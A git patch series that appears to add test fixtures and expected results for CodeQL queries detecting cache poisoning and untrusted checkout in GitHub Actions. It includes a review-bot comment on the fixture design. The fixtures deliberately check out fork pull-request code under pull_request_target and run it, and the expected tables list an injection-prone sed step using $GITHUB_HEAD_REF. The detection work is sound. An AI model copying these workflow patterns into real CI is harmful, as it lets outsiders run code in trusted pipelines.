.github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | 
.github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | 
.github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -588,11 +665,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
@@ -629,8 +706,30 @@ cfgNodes | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > 
foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -709,7 +808,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
@@ -746,8 +845,30 @@ dfNodes | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > 
foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -828,7 +949,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:29:43 | .github/workflows/poisonable_steps.yml@5:5:29:43 | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:40:74 | .github/workflows/poisonable_steps.yml@5:5:40:74 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | 
@@ -865,8 +986,30 @@ nodeLocations | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:9:29:43 | .github/workflows/poisonable_steps.yml@29:9:29:43 | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | 
.github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | +| 
.github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:9:40:74 | .github/workflows/poisonable_steps.yml@40:9:40:74 | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | 
@@ -887,7 +1030,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | From e23054292b86b7b1005595849b19e267f44a95bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 11:49:02 +0200 Subject: [PATCH 388/707] feat(tests): Add new tests Add new tests to verify that, even when a workflow contains a privileged job, a vulnerability located in a different (unprivileged) job is treated as non-privileged and reported as Cache Poisoning instead of Untrusted Checkout --- .../CWE-349/.github/workflows/test21.yml | 44 +++++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 2 + .../CWE-829/.github/workflows/test8.yml | 44 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 1 + .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 5 files changed, 92 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml new file mode 100644 index 000000000000..381cc16a6d16 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml 
@@ -0,0 +1,44 @@ +name: OpenAPI +on: + push: + branches: + - master + tags: + - 'v*' + pull_request_target: + +permissions: {} + +jobs: + + openapi-base: + name: OpenAPI - BASE + if: ${{ github.base_ref != '' }} + runs-on: ubuntu-latest + permissions: read-all + steps: + - name: Checkout repository + uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + fetch-depth: 0 + - name: Generate openapi.json + run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" + + publish-unstable: + name: OpenAPI - Publish Unstable Spec + if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }} + runs-on: ubuntu-latest + needs: + - openapi-base + steps: + - name: Upload openapi.json (unstable) to repository server + uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7 + with: + host: "${{ secrets.REPO_HOST }}" + username: "${{ secrets.REPO_USER }}" + key: "${{ secrets.REPO_KEY }}" + source: openapi-head/openapi.json + strip_components: 1 + target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}" diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 2580531afd3b..eb1412bf0e28 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
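Review bot: The fixture does not isolate the property the commit message describes, because the privileged `publish-unstable` job is gated by `if: ${{ github.event_name != 'pull_request_target' && ... }}` in addition to living in a separate job from the untrusted checkout; the query could classify `openapi-base` as non-privileged for either reason, so a regression in the job-scoping logic would be masked by the event gating. To test "privileged step in a different job" on its own, drop the `pull_request_target` exclusion from that `if` (keeping the tag and owner checks), or add a sibling fixture without it and keep this one as the event-gated variant. The low-privilege poisonable step itself is clear: `openapi-base` checks out `${{ github.event.pull_request.head.sha }}` from the fork repository and runs `dotnet test` on it under `permissions: read-all`, with no write permissions or secrets in that job. The `${{ env.JELLYFIN_VERSION }}` reference in `target:` is never defined anywhere in the workflow; it is harmless for the test, but a leading comment such as `# Fixture appears adapted from a real-world workflow; undefined env var is intentional` would stop readers from "fixing" it. This hunk is the whole new file, so nothing is cut off at its edges.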
@@ -155,6 +155,7 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | #select | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | @@ -177,3 +178,4 @@ edges | .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch | 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
new file mode 100644
index 000000000000..381cc16a6d16
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
@@ -0,0 +1,44 @@
+name: OpenAPI
+on:
+ push:
+ branches:
+ - master
+ tags:
+ - 'v*'
+ pull_request_target:
+
+permissions: {}
+
+jobs:
+
+ openapi-base:
+ name: OpenAPI - BASE
+ if: ${{ github.base_ref != '' }}
+ runs-on: ubuntu-latest
+ permissions: read-all
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ fetch-depth: 0
+ - name: Generate openapi.json
+ run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests"
+
+ publish-unstable:
+ name: OpenAPI - Publish Unstable Spec
+ if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }}
+ runs-on: ubuntu-latest
+ needs:
+ - openapi-base
+ steps:
+ - name: Upload openapi.json (unstable) to repository server
+ uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7
+ with:
+ host: "${{ secrets.REPO_HOST }}"
+ username: "${{ secrets.REPO_USER }}"
+ key: "${{ secrets.REPO_KEY }}"
+ source: openapi-head/openapi.json
+ strip_components: 1
+ target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}"
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index f2d229e80bb5..7b758b0da6d5 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -325,6 +325,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 